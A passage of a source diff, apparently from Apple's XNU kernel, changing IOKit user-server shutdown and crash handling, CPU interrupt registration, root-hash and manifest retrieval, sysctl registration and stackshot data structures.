IOCPURunPlatformPanicActions(type, details); } skip_to_haltRestart: diff --git a/iokit/Kernel/IOService.cpp b/iokit/Kernel/IOService.cpp index c99de8858..04b3faf94 100644 --- a/iokit/Kernel/IOService.cpp +++ b/iokit/Kernel/IOService.cpp @@ -370,6 +370,7 @@ IOService * fSystemPowerAckTo; uint32_t fSystemPowerAckRef; uint8_t fSystemOff; uint8_t fUserServerOff; +uint8_t fWaitingUserServers; void lock(); void unlock(); @@ -4150,6 +4151,12 @@ IOServicePH::serverRemove(IOUserServer * server) if (idx != -1U) { fUserServers->removeObject(idx); } + + if (fWaitingUserServers) { + fWaitingUserServers = false; + IOLockWakeup(gJobsLock, &fWaitingUserServers, /* one-thread */ false); + } + unlock(); } @@ -4275,6 +4282,41 @@ IOServicePH::matchingEnd(IOService * service) serverAck(NULL); } + +void +IOServicePH::systemHalt(void) +{ + OSArray * notifyServers; + uint64_t deadline; + + lock(); + notifyServers = OSArray::withArray(fUserServers); + unlock(); + + if (notifyServers) { + notifyServers->iterateObjects(^bool (OSObject * obj) { + IOUserServer * us; + us = (typeof(us))obj; + us->systemHalt(); + return false; + }); + OSSafeReleaseNULL(notifyServers); + } + + lock(); + clock_interval_to_deadline(1000, kMillisecondScale, &deadline); + while (0 < fUserServers->getCount()) { + fWaitingUserServers = true; + __assert_only int waitResult = + IOLockSleepDeadline(gJobsLock, &fWaitingUserServers, deadline, THREAD_UNINT); + assert((THREAD_AWAKENED == waitResult) || (THREAD_TIMED_OUT == waitResult)); + if (THREAD_TIMED_OUT == waitResult) { + break; + } + } + unlock(); +} + bool IOServicePH::serverSlept(void) { diff --git a/iokit/Kernel/IOStartIOKit.cpp b/iokit/Kernel/IOStartIOKit.cpp index c022807f2..cb13e69e2 100644 --- a/iokit/Kernel/IOStartIOKit.cpp +++ b/iokit/Kernel/IOStartIOKit.cpp @@ -173,7 +173,6 @@ InitIOKit(void *dtTop) IOLibInit(); OSlibkernInit(); IOMachPortInitialize(); - devsw_init(); gIOProgressBackbufferKey = OSSymbol::withCStringNoCopy(kIOProgressBackbufferKey); 
gIORemoveOnReadProperties = OSSet::withObjects((const OSObject **) &gIOProgressBackbufferKey, 1); diff --git a/iokit/Kernel/IOStatistics.cpp b/iokit/Kernel/IOStatistics.cpp index 20d9cc3ef..d0e87bf24 100644 --- a/iokit/Kernel/IOStatistics.cpp +++ b/iokit/Kernel/IOStatistics.cpp @@ -151,6 +151,10 @@ oid_sysctl(__unused struct sysctl_oid *oidp, __unused void *arg1, int arg2, stru int error = EINVAL; uint32_t request = arg2; + if (!IOStatistics::isEnabled()) { + return ENOENT; + } + switch (request) { case kIOStatisticsGeneral: error = IOStatistics::getStatistics(req); @@ -171,17 +175,18 @@ oid_sysctl(__unused struct sysctl_oid *oidp, __unused void *arg1, int arg2, stru SYSCTL_NODE(_debug, OID_AUTO, iokit_statistics, CTLFLAG_RW | CTLFLAG_LOCKED, NULL, "IOStatistics"); static SYSCTL_PROC(_debug_iokit_statistics, OID_AUTO, general, - CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED, NULL, kIOStatisticsGeneral, oid_sysctl, "S", ""); static SYSCTL_PROC(_debug_iokit_statistics, OID_AUTO, workloop, - CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED, NULL, kIOStatisticsWorkLoop, oid_sysctl, "S", ""); static SYSCTL_PROC(_debug_iokit_statistics, OID_AUTO, userclient, - CTLTYPE_STRUCT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_STRUCT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED, NULL, kIOStatisticsUserClient, oid_sysctl, "S", ""); + void IOStatistics::initialize() { @@ -194,10 +199,6 @@ IOStatistics::initialize() return; } - sysctl_register_oid(&sysctl__debug_iokit_statistics_general); - sysctl_register_oid(&sysctl__debug_iokit_statistics_workloop); - sysctl_register_oid(&sysctl__debug_iokit_statistics_userclient); - lock = IORWLockAlloc(); if (!lock) { return; diff --git a/iokit/Kernel/IOUserClient.cpp b/iokit/Kernel/IOUserClient.cpp index 12bc47e46..6d1edda91 100644 
--- a/iokit/Kernel/IOUserClient.cpp +++ b/iokit/Kernel/IOUserClient.cpp @@ -4213,6 +4213,11 @@ is_io_service_open_extended( return kIOReturnBadArgument; } +#if CONFIG_MACF + if (mac_iokit_check_open_service(kauth_cred_get(), service, connect_type) != 0) { + return kIOReturnNotPermitted; + } +#endif do{ if (properties) { return kIOReturnUnsupported; diff --git a/iokit/Kernel/IOUserServer.cpp b/iokit/Kernel/IOUserServer.cpp index 88fd179e5..ffd44f0c7 100644 --- a/iokit/Kernel/IOUserServer.cpp +++ b/iokit/Kernel/IOUserServer.cpp @@ -2867,7 +2867,7 @@ IOUserServer::rpc(IORPC rpc) 0, &message_moved); } else { assert(replySize >= (sizeof(IORPCMessageMach) + sizeof(IORPCMessage))); - ret = kernel_mach_msg_rpc(&mach->msgh, sendSize, replySize, FALSE, &message_moved); + ret = kernel_mach_msg_rpc(&mach->msgh, sendSize, replySize, FALSE, FALSE, &message_moved); } ipc_port_release_send(sendPort); @@ -3365,6 +3365,44 @@ IOUserClient * IOUserServer::withTask(task_t owningTask) IOReturn IOUserServer::clientClose(void) { + OSArray * services; + + if (kIODKLogSetup & gIODKDebug) { + DKLOG("%s::clientClose(%p)\n", getName(), this); + } + + services = NULL; + IOLockLock(fLock); + if (fServices) { + services = OSArray::withArray(fServices); + } + IOLockUnlock(fLock); + + // if this was a an expected exit, termination and stop should have detached at this + // point, so send any provider still attached and not owned by this user server + // the ClientCrashed() notification + if (services) { + services->iterateObjects(^bool (OSObject * obj) { + IOService * service; + IOService * provider; + + service = (IOService *) obj; + if (service->isInactive()) { + return false; + } + provider = service->getProvider(); + if (provider + && (!provider->reserved->uvars || (provider->reserved->uvars->userServer != this))) { + if (kIODKLogSetup & gIODKDebug) { + DKLOG(DKS "::ClientCrashed(" DKS ")\n", DKN(provider), DKN(service)); + } + provider->ClientCrashed(service, 0); + } + return false; + }); + 
services->release(); + } + terminate(); return kIOReturnSuccess; } @@ -3700,11 +3738,10 @@ IOUserServer::serviceNewUserClient(IOService * service, task_t owningTask, void if (!(kIODKDisableEntitlementChecking & gIODKDebug)) { bundleID = NULL; - entitlements = NULL; + entitlements = IOUserClient::copyClientEntitlements(owningTask); if (fEntitlements && fEntitlements->getObject(gIODriverKitUserClientEntitlementAllowAnyKey)) { ok = true; } else { - entitlements = IOUserClient::copyClientEntitlements(owningTask); bundleID = service->copyProperty(gIOModuleIdentifierKey); ok = (entitlements && bundleID @@ -4115,6 +4152,48 @@ IOUserServer::systemPower(bool powerOff) } +void +IOUserServer::systemHalt(void) +{ + OSArray * services; + + if (true || (kIODKLogPM & gIODKDebug)) { + DKLOG("%s::systemHalt()\n", getName()); + } + + IOLockLock(fLock); + services = OSArray::withArray(fServices); + IOLockUnlock(fLock); + + if (services) { + services->iterateObjects(^bool (OSObject * obj) { + IOService * service; + IOService * provider; + IOOptionBits terminateOptions; + bool root; + + service = (IOService *) obj; + provider = service->getProvider(); + if (!provider) { + DKLOG("stale service " DKS " found, skipping termination\n", DKN(service)); + return false; + } + root = (NULL == provider->getProperty(gIOUserServerNameKey, gIOServicePlane)); + if (true || (kIODKLogPM & gIODKDebug)) { + DKLOG("%d: terminate(" DKS ")\n", root, DKN(service)); + } + if (!root) { + return false; + } + terminateOptions = kIOServiceRequired | kIOServiceTerminateNeedWillTerminate; + if (!service->terminate(terminateOptions)) { + IOLog("failed to terminate service %s-0x%llx\n", service->getName(), service->getRegistryEntryID()); + } + return false; + }); + } + OSSafeReleaseNULL(services); +} IOReturn IOUserServer::serviceStarted(IOService * service, IOService * provider, bool result) @@ -4150,9 +4229,21 @@ IOUserServer::serviceStarted(IOService * service, IOService * provider, bool res pmProvider = 
pmProvider->getProvider(); } if (pmProvider) { + IOService * entry; OSObject * prop; + OSObject * nextProp; OSString * str; - prop = pmProvider->copyProperty("non-removable"); + + entry = pmProvider; + prop = NULL; + do { + nextProp = entry->copyProperty("non-removable"); + if (nextProp) { + OSSafeReleaseNULL(prop); + prop = nextProp; + } + entry = entry->getProvider(); + } while (entry); if (prop) { str = OSDynamicCast(OSString, prop); if (str && str->isEqualTo("yes")) { @@ -4287,7 +4378,7 @@ IOUserServer::serviceWillTerminate(IOService * client, IOService * provider, IOO } if (willTerminate) { - if (IOServicePH::serverSlept()) { + if ((true) || IOServicePH::serverSlept()) { client->Stop_async(provider); ret = kIOReturnOffline; } else { @@ -4354,6 +4445,14 @@ IOUserServer::serviceDidStop(IOService * client, IOService * provider) } } +kern_return_t +IOService::ClientCrashed_Impl( + IOService * client, + uint64_t options) +{ + return kIOReturnUnsupported; +} + kern_return_t IOService::Stop_Impl( IOService * provider) @@ -4493,11 +4592,12 @@ IOUserUserClient::externalMethod(uint32_t selector, IOExternalMethodArguments * } if (MACH_PORT_NULL != args->asyncWakePort) { + // this retain is for the OSAction to release + iokit_make_port_send(args->asyncWakePort); kr = CreateActionKernelCompletion(sizeof(IOUserUserClientActionRef), &action); assert(KERN_SUCCESS == kr); ref = (typeof(ref))action->GetReference(); bcopy(args->asyncReference, &ref->asyncRef[0], args->asyncReferenceCount * sizeof(ref->asyncRef[0])); - kr = action->SetAbortedHandler(^(void) { IOUserUserClientActionRef * ref; IOReturn ret; @@ -4528,12 +4628,14 @@ IOUserUserClient::externalMethod(uint32_t selector, IOExternalMethodArguments * OSSafeReleaseNULL(action); if (kIOReturnSuccess != kr) { - if (ref) { - // mig will destroy any async port, remove our pointer to it - bzero(&ref->asyncRef[0], sizeof(ref->asyncRef)); - } + // mig will destroy any async port return kr; } + if (MACH_PORT_NULL != 
args->asyncWakePort) { + // this release is for the mig created send right + iokit_release_port_send(args->asyncWakePort); + } + if (structureOutput) { if (args->structureVariableOutputData) { *args->structureVariableOutputData = structureOutput; diff --git a/iokit/Kernel/arm/AppleARMSMP.cpp b/iokit/Kernel/arm/AppleARMSMP.cpp index 9415e0226..9121b6bf6 100644 --- a/iokit/Kernel/arm/AppleARMSMP.cpp +++ b/iokit/Kernel/arm/AppleARMSMP.cpp @@ -37,6 +37,7 @@ extern "C" { #include #include +#include #include #include #include @@ -81,35 +82,53 @@ idle_timer_wrapper(void */*refCon*/, uint64_t *new_timeout_ticks) gPMGR->updateCPUIdle(new_timeout_ticks); } +static OSDictionary * +matching_dict_for_cpu_id(unsigned int cpu_id) +{ + // The cpu-id property in EDT doesn't necessarily match the dynamically + // assigned logical ID in XNU, so look up the cpu node by the physical + // (cluster/core) ID instead. + OSSymbolConstPtr cpuTypeSymbol = OSSymbol::withCString("cpu"); + OSSymbolConstPtr cpuIdSymbol = OSSymbol::withCString("reg"); + OSDataPtr cpuId = OSData::withBytes(&(topology_info->cpus[cpu_id].phys_id), sizeof(uint32_t)); + + OSDictionary *propMatch = OSDictionary::withCapacity(4); + propMatch->setObject(gIODTTypeKey, cpuTypeSymbol); + propMatch->setObject(cpuIdSymbol, cpuId); + + OSDictionary *matching = IOService::serviceMatching("IOPlatformDevice"); + matching->setObject(gIOPropertyMatchKey, propMatch); + + propMatch->release(); + cpuTypeSymbol->release(); + cpuIdSymbol->release(); + cpuId->release(); + + return matching; +} + static void register_aic_handlers(const ml_topology_cpu *cpu_info, ipi_handler_t ipi_handler, perfmon_interrupt_handler_func pmi_handler) { - const int n_irqs = 3; - int i; - IOInterruptVectorNumber irqlist[n_irqs] = { - cpu_info->self_ipi_irq, - cpu_info->other_ipi_irq, - cpu_info->pmi_irq }; - - IOService *fakeCPU = new IOService(); - if (!fakeCPU || !fakeCPU->init()) { - panic("Can't initialize fakeCPU"); - } + OSDictionary *matching = 
matching_dict_for_cpu_id(cpu_info->cpu_id); + IOService *cpu = IOService::waitForMatchingService(matching, UINT64_MAX); + matching->release(); - IOInterruptSource source[n_irqs]; - for (i = 0; i < n_irqs; i++) { - source[i].vectorData = OSData::withBytes(&irqlist[i], sizeof(irqlist[0])); + OSArray *irqs = (OSArray *) cpu->getProperty(gIOInterruptSpecifiersKey); + if (!irqs) { + panic("Error finding interrupts for CPU %d", cpu_info->cpu_id); } - fakeCPU->_interruptSources = source; - if (cpu_info->self_ipi_irq && cpu_info->other_ipi_irq) { + unsigned int irqcount = irqs->getCount(); + + if (irqcount == 3) { // Legacy configuration, for !HAS_IPI chips (pre-Skye). - if (gAIC->registerInterrupt(fakeCPU, 0, NULL, (IOInterruptHandler)ipi_handler, NULL) != kIOReturnSuccess || - gAIC->enableInterrupt(fakeCPU, 0) != kIOReturnSuccess || - gAIC->registerInterrupt(fakeCPU, 1, NULL, (IOInterruptHandler)ipi_handler, NULL) != kIOReturnSuccess || - gAIC->enableInterrupt(fakeCPU, 1) != kIOReturnSuccess) { + if (cpu->registerInterrupt(0, NULL, (IOInterruptAction)ipi_handler, NULL) != kIOReturnSuccess || + cpu->enableInterrupt(0) != kIOReturnSuccess || + cpu->registerInterrupt(2, NULL, (IOInterruptAction)ipi_handler, NULL) != kIOReturnSuccess || + cpu->enableInterrupt(2) != kIOReturnSuccess) { panic("Error registering IPIs"); } #if !defined(HAS_IPI) @@ -118,17 +137,14 @@ register_aic_handlers(const ml_topology_cpu *cpu_info, aic_ipis = true; #endif } + // Conditional, because on Skye and later, we use an FIQ instead of an external IRQ. 
- if (pmi_handler && cpu_info->pmi_irq) { - if (gAIC->registerInterrupt(fakeCPU, 2, NULL, (IOInterruptHandler)pmi_handler, NULL) != kIOReturnSuccess || - gAIC->enableInterrupt(fakeCPU, 2) != kIOReturnSuccess) { + if (pmi_handler && irqcount == 1) { + if (cpu->registerInterrupt(1, NULL, (IOInterruptAction)pmi_handler, NULL) != kIOReturnSuccess || + cpu->enableInterrupt(1) != kIOReturnSuccess) { panic("Error registering PMI"); } } - - for (i = 0; i < n_irqs; i++) { - source[i].vectorData->release(); - } } static void @@ -158,7 +174,6 @@ cpu_boot_thread(void */*unused0*/, wait_result_t /*unused1*/) } memset(machProcessors, 0, array_size); - ml_cpu_init_state(); for (unsigned int cpu = 0; cpu < topology_info->num_cpus; cpu++) { const ml_topology_cpu *cpu_info = &topology_info->cpus[cpu]; const unsigned int cpu_id = cpu_info->cpu_id; @@ -192,6 +207,7 @@ cpu_boot_thread(void */*unused0*/, wait_result_t /*unused1*/) panic("processor_start failed"); } } + ml_cpu_init_completed(); IOService::publishResource(gIOAllCPUInitializedKey, kOSBooleanTrue); } @@ -221,7 +237,8 @@ PE_cpu_start(cpu_id_t target, unsigned int cpu_id = target_to_cpu_id(target); if (cpu_id != boot_cpu) { - gPMGR->enableCPUCore(cpu_id); + extern unsigned int LowResetVectorBase; + gPMGR->enableCPUCore(cpu_id, ml_vtophys((vm_offset_t)&LowResetVectorBase)); } return KERN_SUCCESS; } diff --git a/iokit/Kernel/i386/IOKeyStoreHelper.cpp b/iokit/Kernel/i386/IOKeyStoreHelper.cpp index ca0e3b895..8c71598d7 100644 --- a/iokit/Kernel/i386/IOKeyStoreHelper.cpp +++ b/iokit/Kernel/i386/IOKeyStoreHelper.cpp @@ -54,24 +54,19 @@ static IOMemoryDescriptor* apfsKeyData = NULL; IOMemoryDescriptor* IOGetAPFSKeyStoreData(); void IOSetAPFSKeyStoreData(IOMemoryDescriptor* data); -static volatile UInt32 arvRootHashFetched = 0; +static volatile UInt32 ARVRootHashFetched = 0; static volatile UInt32 bsARVRootHashFetched = 0; -static IOMemoryDescriptor* arvRootHashData = NULL; -static IOMemoryDescriptor* bsARVRootHashData = NULL; 
IOMemoryDescriptor* IOGetARVRootHashData(void); -void IOSetARVRootHashData(IOMemoryDescriptor* arvData); - IOMemoryDescriptor* IOGetBaseSystemARVRootHashData(void); -bool IOBaseSystemARVRootHashAvailable(void); -void IOSetBaseSystemARVRootHashData(IOMemoryDescriptor* arvData); +bool IOBaseSystemARVRootHashAvailable(void); -static volatile UInt32 arvManifestFetched = 0; -static IOMemoryDescriptor* arvManifestData = NULL; +static volatile UInt32 ARVManifestFetched = 0; +static volatile UInt32 bsARVManifestFetched = 0; IOMemoryDescriptor* IOGetARVManifestData(void); -void IOSetARVManifestData(IOMemoryDescriptor* arvData); +IOMemoryDescriptor* IOGetBaseSystemARVManifestData(void); __END_DECLS @@ -181,34 +176,15 @@ IOGetAPFSKeyStoreData() // ARV Root Hash fetcher -// Store in-memory Root Hash -void -IOSetARVRootHashData(IOMemoryDescriptor* arvData) -{ - // Do not allow re-fetching of the boot_args root hash by passing NULL here. - if (arvData) { - arvRootHashData = arvData; - arvRootHashFetched = 0; - } -} - -// Retrieve any root hash we may have (stored in boot_args or in-memory) +// Retrieve any root hash we may have (stored in boot_args) IOMemoryDescriptor* IOGetARVRootHashData(void) { // Check if someone got the root hash before us - if (!OSCompareAndSwap(0, 1, &arvRootHashFetched)) { + if (!OSCompareAndSwap(0, 1, &ARVRootHashFetched)) { return NULL; } - // Do we have in-memory root hash? - if (arvRootHashData) { - IOMemoryDescriptor* arvData = arvRootHashData; - arvRootHashData = NULL; - return arvData; - } - - // Looks like there was no in-memory root hash and it's the first call - try boot_args boot_args* args = (boot_args*)PE_state.bootArgs; DEBG("%s: data at address %llu size %llu\n", __func__, args->arvRootHashStart, args->arvRootHashSize); @@ -228,68 +204,62 @@ IOGetARVRootHashData(void) return memoryDescriptor; } -// Base System Analogues +// Base System Analogue IOMemoryDescriptor* IOGetBaseSystemARVRootHashData(void) { - //TBD! 
- return NULL; + // Check if someone got the base system root hash before us + if (!OSCompareAndSwap(0, 1, &bsARVRootHashFetched)) { + return NULL; + } + + boot_args* args = (boot_args*)PE_state.bootArgs; + + DEBG("%s: data at address %llu size %llu\n", __func__, args->bsARVRootHashStart, args->bsARVRootHashSize); + if (args->bsARVRootHashStart == 0) { + return NULL; + } + + // We have the base system root hash in the boot_args, create IOMemoryDescriptor for the blob + IOAddressRange ranges; + ranges.address = args->bsARVRootHashStart; + ranges.length = args->bsARVRootHashSize; + + const IOOptionBits options = kIODirectionInOut | kIOMemoryTypePhysical64 | kIOMemoryMapperNone; + + IOMemoryDescriptor* memoryDescriptor = IOMemoryDescriptor::withOptions(&ranges, 1, 0, NULL, options); + DEBG("%s: memory descriptor %p\n", __func__, memoryDescriptor); + return memoryDescriptor; } bool IOBaseSystemARVRootHashAvailable(void) { - // Check if someone got the root hash before us - if (!OSCompareAndSwap(0, 1, &bsARVRootHashFetched)) { + boot_args* args = (boot_args*)PE_state.bootArgs; + + if (args->bsARVRootHashStart == 0 || args->bsARVRootHashSize == 0) { return false; } - // Do we have in-memory root hash? - if (bsARVRootHashData) { - return true; + if (args->bsARVManifestStart == 0 || args->bsARVManifestSize == 0) { + return false; } - return false; -} - -void -IOSetBaseSystemARVRootHashData(IOMemoryDescriptor* arvData) -{ - return; + return true; } - // ARV Manifest fetcher -// Store in-memory Manifest -void -IOSetARVManifestData(IOMemoryDescriptor* arvData) -{ - // Do not allow re-fetching of the boot_args manifest by passing NULL here. 
- if (arvData) { - arvManifestData = arvData; - arvManifestFetched = 0; - } -} - -// Retrieve any manifest we may have (stored in boot_args or in-memory) +// Retrieve any manifest we may have (stored in boot_args) IOMemoryDescriptor* IOGetARVManifestData(void) { // Check if someone got the manifest before us - if (!OSCompareAndSwap(0, 1, &arvManifestFetched)) { + if (!OSCompareAndSwap(0, 1, &ARVManifestFetched)) { return NULL; } - // Do we have in-memory manifest? - if (arvManifestData) { - IOMemoryDescriptor* arvData = arvManifestData; - arvManifestData = NULL; - return arvData; - } - - // Looks like there was no in-memory manifest and it's the first call - try boot_args boot_args* args = (boot_args*)PE_state.bootArgs; DEBG("%s: data at address %llu size %llu\n", __func__, args->arvManifestStart, args->arvManifestSize); @@ -308,3 +278,32 @@ IOGetARVManifestData(void) DEBG("%s: memory descriptor %p\n", __func__, memoryDescriptor); return memoryDescriptor; } + +// Base System Analogue + +IOMemoryDescriptor* +IOGetBaseSystemARVManifestData(void) +{ + // Check if someone got the base system manifest before us + if (!OSCompareAndSwap(0, 1, &bsARVManifestFetched)) { + return NULL; + } + + boot_args* args = (boot_args*)PE_state.bootArgs; + + DEBG("%s: data at address %llu size %llu\n", __func__, args->bsARVManifestStart, args->bsARVManifestSize); + if (args->bsARVManifestStart == 0) { + return NULL; + } + + // We have the manifest in the boot_args, create IOMemoryDescriptor for the blob + IOAddressRange ranges; + ranges.address = args->bsARVManifestStart; + ranges.length = args->bsARVManifestSize; + + const IOOptionBits options = kIODirectionInOut | kIOMemoryTypePhysical64 | kIOMemoryMapperNone; + + IOMemoryDescriptor* memoryDescriptor = IOMemoryDescriptor::withOptions(&ranges, 1, 0, NULL, options); + DEBG("%s: memory descriptor %p\n", __func__, memoryDescriptor); + return memoryDescriptor; +} diff --git a/iokit/Tests/Tests.cpp b/iokit/Tests/Tests.cpp index 
ac67b43b5..7624171d6 100644 --- a/iokit/Tests/Tests.cpp +++ b/iokit/Tests/Tests.cpp @@ -738,6 +738,6 @@ sysctl_iokittest(__unused struct sysctl_oid *oidp, __unused void *arg1, __unused } SYSCTL_PROC(_kern, OID_AUTO, iokittest, - CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED, NULL, 0, sysctl_iokittest, "I", ""); #endif // __clang_analyzer__ diff --git a/iokit/bsddev/IOKitBSDInit.cpp b/iokit/bsddev/IOKitBSDInit.cpp index 8205d93bc..e2769e31b 100644 --- a/iokit/bsddev/IOKitBSDInit.cpp +++ b/iokit/bsddev/IOKitBSDInit.cpp @@ -55,6 +55,8 @@ extern dev_t mdevlookup(int devid); extern void mdevremoveall(void); extern int mdevgetrange(int devid, uint64_t *base, uint64_t *size); extern void di_root_ramfile(IORegistryEntry * entry); +extern int IODTGetDefault(const char *key, void *infoAddr, unsigned int infoSize); +extern boolean_t cpuid_vmm_present(void); #define ROUNDUP(a, b) (((a) + ((b) - 1)) & (~((b) - 1))) @@ -544,6 +546,26 @@ do_reboot: return true; } +int +IOGetVMMPresent(void) +{ + int hv_vmm_present = 0; + +#if defined(__arm64__) + if (IODTGetDefault("vmm-present", &hv_vmm_present, sizeof(hv_vmm_present)) < 0) { + return 0; + } + + if (hv_vmm_present != 0) { + hv_vmm_present = 1; + } +#elif defined(__x86_64__) + hv_vmm_present = cpuid_vmm_present(); +#endif + + return hv_vmm_present; +} + kern_return_t IOFindBSDRoot( char * rootName, unsigned int rootNameSize, dev_t * root, u_int32_t * oflags ) diff --git a/libkdd/kcdata.h b/libkdd/kcdata.h index f2eaf624c..d57bd0c27 100644 --- a/libkdd/kcdata.h +++ b/libkdd/kcdata.h @@ -492,7 +492,7 @@ struct kcdata_type_definition { #define STACKSHOT_KCTYPE_TASK_SNAPSHOT 0x905u /* task_snapshot_v2 */ #define STACKSHOT_KCTYPE_THREAD_SNAPSHOT 0x906u /* thread_snapshot_v2, thread_snapshot_v3 */ #define STACKSHOT_KCTYPE_DONATING_PIDS 0x907u /* int[] */ -#define STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO 0x908u /* same as KCDATA_TYPE_LIBRARY_LOADINFO64 
*/ +#define STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO 0x908u /* dyld_shared_cache_loadinfo */ #define STACKSHOT_KCTYPE_THREAD_NAME 0x909u /* char[] */ #define STACKSHOT_KCTYPE_KERN_STACKFRAME 0x90Au /* struct stack_snapshot_frame32 */ #define STACKSHOT_KCTYPE_KERN_STACKFRAME64 0x90Bu /* struct stack_snapshot_frame64 */ @@ -556,17 +556,42 @@ struct dyld_uuid_info_64 { uuid_t imageUUID; }; +/* + * N.B.: Newer kernels output dyld_shared_cache_loadinfo structures + * instead of this, since the field names match their contents better. + */ struct dyld_uuid_info_64_v2 { uint64_t imageLoadAddress; /* XXX image slide */ uuid_t imageUUID; /* end of version 1 of dyld_uuid_info_64. sizeof v1 was 24 */ - uint64_t imageSlidBaseAddress; /* slid base address of image */ + uint64_t imageSlidBaseAddress; /* slid base address or slid first mapping of image */ +}; + +/* + * This is the renamed version of dyld_uuid_info_64 with more accurate + * field names, for STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO. Any users + * must be aware of the dyld_uuid_info_64* version history and ensure + * the fields they are accessing are within the actual bounds. + * + * OLD_FIELD NEW_FIELD + * imageLoadAddress sharedCacheSlide + * imageUUID sharedCacheUUID + * imageSlidBaseAddress sharedCacheUnreliableSlidBaseAddress + * - sharedCacheSlidFirstMapping + */ +struct dyld_shared_cache_loadinfo { + uint64_t sharedCacheSlide; /* image slide value */ + uuid_t sharedCacheUUID; + /* end of version 1 of dyld_uuid_info_64. sizeof v1 was 24 */ + uint64_t sharedCacheUnreliableSlidBaseAddress; /* for backwards-compatibility; use sharedCacheSlidFirstMapping if available */ + /* end of version 2 of dyld_uuid_info_64. 
sizeof v2 was 32 */ + uint64_t sharedCacheSlidFirstMapping; /* slid base address of first mapping */ }; struct dyld_aot_cache_uuid_info { - uint64_t x86SlidBaseAddress; /* slid base address of x86 shared cache */ + uint64_t x86SlidBaseAddress; /* slid first mapping address of x86 shared cache */ uuid_t x86UUID; /* UUID of x86 shared cache */ - uint64_t aotSlidBaseAddress; /* slide base address of aot cache */ + uint64_t aotSlidBaseAddress; /* slide first mapping address of aot cache */ uuid_t aotUUID; /* UUID of aot shared cache */ }; @@ -618,6 +643,9 @@ enum task_snapshot_flags { kTaskIsDirtyTracked = 0x4000000, kTaskAllowIdleExit = 0x8000000, kTaskIsTranslated = 0x10000000, + kTaskSharedRegionNone = 0x20000000, /* task doesn't have a shared region */ + kTaskSharedRegionSystem = 0x40000000, /* task is attached to system shared region */ + kTaskSharedRegionOther = 0x80000000, /* task is attached to a different shared region */ }; enum thread_snapshot_flags { @@ -876,6 +904,12 @@ struct stackshot_duration { uint64_t stackshot_duration_outer; } __attribute__((packed)); +struct stackshot_duration_v2 { + uint64_t stackshot_duration; + uint64_t stackshot_duration_outer; + uint64_t stackshot_duration_prior; +} __attribute__((packed)); + struct stackshot_fault_stats { uint32_t sfs_pages_faulted_in; /* number of pages faulted in using KDP fault path */ uint64_t sfs_time_spent_faulting; /* MATUs spent faulting */ diff --git a/libkdd/kcdtypes.c b/libkdd/kcdtypes.c index cca45ba6c..11d38b068 100644 --- a/libkdd/kcdtypes.c +++ b/libkdd/kcdtypes.c @@ -157,9 +157,14 @@ kcdata_get_typedescription(unsigned type_id, uint8_t * buffer, uint32_t buffer_s case STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO: { i = 0; + /* + * for backwards compatibility, we keep the old field names, but the + * new data is being put in dyld_shared_cache_loadinfo + */ _SUBTYPE(KC_ST_UINT64, struct dyld_uuid_info_64_v2, imageLoadAddress); _SUBTYPE_ARRAY(KC_ST_UINT8, struct dyld_uuid_info_64_v2, imageUUID, 16); 
_SUBTYPE(KC_ST_UINT64, struct dyld_uuid_info_64_v2, imageSlidBaseAddress); + _SUBTYPE(KC_ST_UINT64, struct dyld_shared_cache_loadinfo, sharedCacheSlidFirstMapping); setup_type_definition(retval, type_id, i, "shared_cache_dyld_load_info"); break; } @@ -546,10 +551,12 @@ kcdata_get_typedescription(unsigned type_id, uint8_t * buffer, uint32_t buffer_s case STACKSHOT_KCTYPE_STACKSHOT_DURATION: { i = 0; - _SUBTYPE(KC_ST_UINT64, struct stackshot_duration, stackshot_duration); - _SUBTYPE(KC_ST_UINT64, struct stackshot_duration, stackshot_duration_outer); + _SUBTYPE(KC_ST_UINT64, struct stackshot_duration_v2, stackshot_duration); + _SUBTYPE(KC_ST_UINT64, struct stackshot_duration_v2, stackshot_duration_outer); + _SUBTYPE(KC_ST_UINT64, struct stackshot_duration_v2, stackshot_duration_prior); subtypes[0].kcs_flags |= KCS_SUBTYPE_FLAGS_MERGE; subtypes[1].kcs_flags |= KCS_SUBTYPE_FLAGS_MERGE; + subtypes[2].kcs_flags |= KCS_SUBTYPE_FLAGS_MERGE; setup_type_definition(retval, type_id, i, "stackshot_duration"); break; } diff --git a/libkern/c++/OSKext.cpp b/libkern/c++/OSKext.cpp index 8b7c090e3..009375baa 100644 --- a/libkern/c++/OSKext.cpp +++ b/libkern/c++/OSKext.cpp @@ -975,7 +975,9 @@ OSKext::removeKextBootstrap(void) int dt_symtab_size = 0; int dt_result = 0; - kernel_segment_command_t * seg_to_remove = NULL; + kernel_segment_command_t * seg_kld = NULL; + kernel_segment_command_t * seg_klddata = NULL; + kernel_segment_command_t * seg_linkedit = NULL; const char __unused * dt_segment_name = NULL; void __unused * segment_paddress = NULL; @@ -1015,42 +1017,60 @@ OSKext::removeKextBootstrap(void) } /***** - * KLD bootstrap segment. + * KLD & KLDDATA bootstrap segments. 
